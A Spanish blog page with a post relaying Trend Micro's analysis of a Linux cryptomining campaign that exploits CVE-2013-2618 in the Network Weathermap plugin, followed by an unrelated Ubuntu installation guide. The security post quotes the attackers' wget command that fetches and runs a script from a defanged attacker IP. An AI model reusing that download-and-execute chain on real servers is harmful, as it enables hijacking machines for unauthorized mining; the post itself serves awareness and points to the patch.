Una falla de Linux de 5 años permite a los atacantes minar criptomonedas

fallo linux

Esto de la minera de las criptomonedas con el uso de equipos remotos sin la autorización de los dueños de estos se esta convirtiendo en una tendencia. Ya había hablado sobre esto en algunas ocasiones aquí en el blog sobre este tipo de situación.

Y es que esto ya se ha salido de control totalmente desde el momento en que las criptomonedas han tomado un lugar y valor bastante considerable, personas con los conocimientos suficientes para acceder a equipos vulnerando su seguridad han dejado de lado el perder el tiempo en buscar información importante o cuentas de banco para obtener un beneficio monetario.

En vez de hace esto optan por lo mas sencillo en tomar el control de estos equipos y unirlos en una red de minería y además para otras tareas que comúnmente hacen con una botnet.

De esta forma suele ser más renumerarte, pues solo se están centrando en el dinero instantáneo que esto genera.

Con la comprensión inteligente de las tendencias del mercado y el conocimiento adecuado de cripto comercio, uno puede cosechar grandes beneficios.

¿Es Linux realmente un sistema seguro?

Muchos tenemos la idea de que Linux es un sistema operativo seguro casi perfecto, la realidad es que todavía tiene algunos defectos.

Pues hace algunos días TrendMicro realizo un hallazgo, en el cual reveló un nuevo defecto en los sistemas Linux que dio a los hackers la ventaja de extraer criptomonedas usando los servidores y máquinas Linux.

En un comunicado a través de su blog comentaron lo siguiente:

A través de nuestro monitoreo relacionado con la respuesta a incidentes, observamos intentos de intrusión cuyos indicadores pudimos correlacionar con una campaña anterior de minería de criptomoneda que utilizó el malware JenkinsMiner.

La diferencia: esta campaña se dirige a servidores Linux. También es un caso clásico de vulnerabilidades reutilizadas, ya que explota una falla de seguridad obsoleta cuyo parche ha estado disponible durante casi cinco años.

En este comunicado mediante su análisis lograron identificar los sitios afectados por este fallo que afecta principalmente a Japón, Taiwán, China, EE. UU y la India.

Análisis del ataque

Mediante el análisis por parte de Smart Protection Network de Trend Micro detallan un poco en como los atacantes se aprovechan de este fallo:

Los operadores de esta campaña estaban explotando CVE-2013-2618 , una vulnerabilidad fechada en el plugin Camapi Network Weathermap, que los administradores del sistema usan para visualizar la actividad de la red.

En cuanto a por qué están explotando un viejo defecto de seguridad: Network Weathermap solo tiene dos vulnerabilidades reportadas públicamente hasta el momento, ambas desde junio de 2014.

Es posible que estos atacantes estén aprovechando no solo una falla de seguridad para la cual un exploit está disponible sino también del retraso de parches que ocurre en las organizaciones que usan la herramienta de código abierto.

Básicamente el ataque es mediante un ataque XSS:

weathermap-cryptominer-4

La parte borrosa es el objetivo de ataque, un servidor web con un puerto .

El archivo /plugins/weathermap/configs/conn.php es el archivo resultante del ataque persistente XSS en /plugins/weathermap /php .

Además de conn.php inicial, observamos una solicitud HTTP similar que se aplica a una página llamada ‘ cools.php ‘.

El programa para minar criptomonedas es distribuido a través de la vulnerabilidad del mapa meteorológico de PHP en los objetivos que son servidores de Linux

En la imagen se puede apreciar cómo se genera el ataque y se describe del siguiente modo:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Lo que hace es mandar la indicación de descargar un archivo con wget la cual es una utilidad que casi todas las distribuciones de Linux tienen instalada por defecto

chmod 775 watchd0g.sh

hace que el archivo sea ejecutable

./watchd0g.sh

Lo que hace finalmente, es que el archivo se ejecute en el servidor.

Afortunadamente, ya hay un parche ( CVE-2013-2618 ) disponible para la falla y puedes descargarlo desde este enlace.

Si quieres conocer mas al respecto de este fallo puedes visitar este enlace.

Fuente: Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

 

Telegram @Entreverao

Anuncios

¿Pensando en instalar Ubuntu? Varias cosas que deberías tener en cuenta

ubuntu-1

El último gran lanzamiento de Canonical ha cumplido su primer mes de vida y, con las actualizaciones que ya ha recibido, se puede decir que se ha estabilizado lo suficiente como para considerar dar el salto. Es el momento perfecto, pues, para actualizar nuestra guía de instalación de Ubuntu, así como otros tutoriales que irán apareciendo en los próximos días.

Antes, con el objetivo de que los artículos que publiquemos sean lo más concisos posible, os exponemos una serie de consideraciones previas especialmente dedicadas a nuevos usuarios. Y es que instalar Ubuntu es muy sencillo, pero yendo sobre seguro se tarda mucho menos en hacerlo todo… y no hablamos solo del proceso de instalación. Así que, antes de hacer nada, piensa en lo siguiente:

¿Qué Ubuntu instalar?

Con respecto a la versión, en estos momentos, hablamos de Ubuntu 18.04 LTS, disponible desde abril de 2018 y con soporte hasta 2023. Sin embargo, Ubuntu tiene una serie de ediciones oficiales que se pueden ajustar mejor a tus necesidades, ya sea por gusto personal o por las especificaciones de tu equipo. La diferencia entre ellas es el entorno de escritorio y el consumo del mismo.

De acuerdo a nuestras pruebas te recomendamos, en orden:

  • Kubuntu, Ubuntu, Ubuntu MATE, Ubuntu Budgie, Xubuntu, Lubuntu.

En relación al consumo de recursos, la recomendación varía (de menos a más recursos):

  • Lubuntu, Xubuntu, Ubuntu MATE, Kubuntu, Ubuntu Budgie, Ubuntu.

No obstante, probarlas todas no cuesta demasiado y vale la pena invertir un rato en ello.

Probar, antes de instalar

¿Quieres instalar Ubuntu por mera curiosidad? Si lo único que te interesa es echar un vistazo, puedes descargarlo, instalarlo en una memoria USB y arrancar tu equipo con ella, sin alterar tu disco y el sistema operativo que ya tengas instalado. Necesitarás:

  • Una memoria USB de 2 GB o más.
  • La imagen de instalación de Ubuntu (enlace anterior).
  • Una aplicación para pasar la imagen al USB. Te recomendamos Etcher.
  • Buscar en tu BIOS la opción de arranque adecuada.

Pero ten en cuenta que de este modo el rendimiento y estabilidad de Ubuntu (o de cualquier otra distribución Linux que pruebes en vivo) se resienten considerablemente.

Estabilidad y soporte

Si buscas un sistema de escritorio para producción a largo plazo y lo más importante para ti es la estabilidad, tienes dos opciones que quizás te convengan más que instalar Ubuntu 18.04 en estos momentos:

  • Ubuntu 16.04.4 LTS, actualmente en su “punto de maduración óptimo” y con soporte hasta 2021.
  • Esperar a que en julio se lance Ubuntu 18.04.1, primera versión de mantenimiento y la que Canonical habilitará como actualización para los usuarios de Ubuntu 16.04.

Alternativas

La “familia Ubuntu” está muy bien nutrida y las versiones LTS (con soporte extendido por cinco años) son su mejor exponente, pero GNU/Linux ofrece un amplio abanico de alternativas de lo más interesante. De todas, la única que recomendamos para nuevos usuarios es Linux Mint, basada en Ubuntu LTS y, por lo tanto, con los beneficios de esta, incluyendo el soporte y la compatibilidad de software; pero con una presentación más amigable si cabe.

Linux Mint, a su vez, cuenta con tres ediciones oficiales, que también se distinguen por el entorno de escritorio y que te recomendamos en el siguiente orden (en orden inverso, de menor a mayor consumo de recursos):

  • Linux Mint Cinnamon, Linux Mint MATE y Linux Mint Xfce.

La última versión disponible es Linux Mint 18.3, basada en Ubuntu 16.04 LTS y con soporte hasta 2021; mientras que la próxima Linux Mint 19 se basa en Ubuntu 18.04 LTS y su lanzamiento se espera para las próximas semana (igualmente, conviene que repose un tiempo antes de instalar).

Instalación en equipos de 32-bit

Todas las ediciones oficiales de Ubuntu mantienen el soporte de 32-bit, excepto la propia Ubuntu. Para instalar Ubuntu en equipos de 32-bit hay que seguir una guía diferente y algo más complicada. No obstante, esta será muy probablemente la última versión de largo recorrido en soportar los 32-bit.

Ubuntu y Windows

Si lo que te interesa es instalar Ubuntu en el mismo equipo en el que usas Windows, vete a la guía de instalación de Ubuntu y Windows que publican nuestros compañeros de MuyComputer, actualizada para las últimas versiones de ambos sistemas.

Hasta aquí lo principal. Siempre que tengas claro todo lo anterior, instalar Ubuntu es tan sencillo como instalar Windows y mucho más rápido. En breve publicamos la guía de instalación.

 

Fuente: muylinux

Telegram @Entreverao